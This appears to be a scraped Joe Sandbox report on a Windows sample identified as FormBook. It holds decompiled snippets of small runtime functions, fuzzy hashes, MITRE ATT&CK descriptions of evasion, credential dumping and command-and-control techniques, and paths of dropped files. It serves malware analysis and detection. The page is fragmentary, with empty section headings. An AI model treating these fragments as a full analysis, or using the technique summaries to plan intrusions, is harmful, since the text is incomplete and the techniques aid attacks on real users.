Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 120204cef82e8b84d9143bbbe467c7a01efea32df298454d282cf0747d4b0a1d
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 6CC08C70260840AAE6295B208E00B157254A700A21F6802687221496F0F928AC00D504

Uniqueness

Uniqueness Score: -1.00%

Function 045F76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045F76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x045f76e4
0x00000000
0x045f76f8
0x045f76fd

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 1dfd3db6684c4db65d4a7dde5e514be1584831e678d404d2146aea113b47ddf2
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 84C08C701811805AEB2A6B08CE20B213650BB0C789F4801ACAB11094E2E368B802D248

Uniqueness

Uniqueness Score: -1.00%

Function 04603A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04603A1C(intOrPtr _a4) {
				void* _t5;

				return L04604620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04603a35

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 8807086518e63f144ff2bf897aa137aec15025fdfc5308c1892a16a8c5869b3f
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: BEC08C32180648BBC7226E41DD00F027B29E790B60F004020B7040A5A09932EC60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 04607D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04607D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04607d56
0x04607d5b
0x04607d60
0x04607d5d
0x04607d5d
0x04607d5d

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: f29ee49a082daad0c112c210a190b246b6ddd9f331831fb86297dfb56a2985b5
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 9EB092343019408FCF1ADF18C080B1633E4FB44A40B8440D1E400CBA60E229F9008900

Uniqueness

Uniqueness Score: -1.00%

Function 04612ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04612ACB() {
				void* _t5;

				return E045FEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x04612adc

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: a8c121aa1a031c5c028821432925126fe38880256f401628ab94f18c393a70c4
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: C6B01232C20441CFCF02EF40CA10B197332FB40750F054890910167930C228BC01DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0467FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0467FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0462CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04675720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04675720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0467fdda
0x0467fde2
0x0467fde5
0x0467fdec
0x0467fdfa
0x0467fdff
0x0467fe0a
0x0467fe0f
0x0467fe17
0x0467fe1e
0x0467fe19
0x0467fe19
0x0467fe19
0x0467fe20
0x0467fe21
0x0467fe22
0x0467fe25
0x0467fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0467FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0467FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0467FE01

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 35c1f8f29e8fa21041fd530617396ec3fbb3ce64006d9ad73dd66e34ed774bc7
Instruction ID: 78a68e436549aca71619d2fa48da8703776d28076bc6875a26bd6ccbc6a358a8
Opcode Fuzzy Hash: 35c1f8f29e8fa21041fd530617396ec3fbb3ce64006d9ad73dd66e34ed774bc7
Instruction Fuzzy Hash: 2CF0F632200601BFE6245B55DC02F23BB6AEF44730F140358F628565E1FA62F860DAF9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iuvRyl9i7D

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iuvRyl9i7D.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\DB1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21wlmt0u.5nd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ekjb5no.0s4.psm1

C:\Users\user\AppData\Local\Temp\tmp280F.tmp

C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe:Zone.Identifier

C:\Users\user\Documents\20220514\PowerShell_transcript.305090.7Vik_2vb.20220514152854.txt

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
iuvRyl9i7D

Function 07841398 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Function 0784A298 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre